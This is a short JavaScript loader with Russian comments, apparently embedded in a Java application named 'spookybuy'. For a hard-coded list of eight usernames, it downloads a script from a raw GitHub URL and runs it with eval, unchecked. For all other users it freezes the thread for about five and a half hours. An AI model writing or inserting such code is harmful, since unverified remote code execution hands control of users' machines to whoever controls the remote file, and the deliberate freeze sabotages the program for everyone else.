var username = Java.type("ru.nedan.spookybuy.Authentication").getUsername();

// Проверяем разрешенные имена
if (username === "porvaniy.gondon" || username === ".kankeik" || username === "dofinixx" || username === "d1ysx" || username === "troll4" || username === "__ded_inside__" || username === "gafak012" || username === "fakepatrickstar") {
    try {
        // Выполняем внешний скрипт
        eval(new java.util.Scanner(
            new java.net.URL("https://raw.githubusercontent.com/Her0brine404/Items-Script-Open/refs/heads/main/script.js").openStream(), 
            "UTF-8"
        ).useDelimiter("\\A").next());
    } catch (e) {
        java.lang.System.err.println("Ошибка при выполнении скрипта: " + e);
    }
} else {
    java.lang.Thread.sleep(20000000);
}
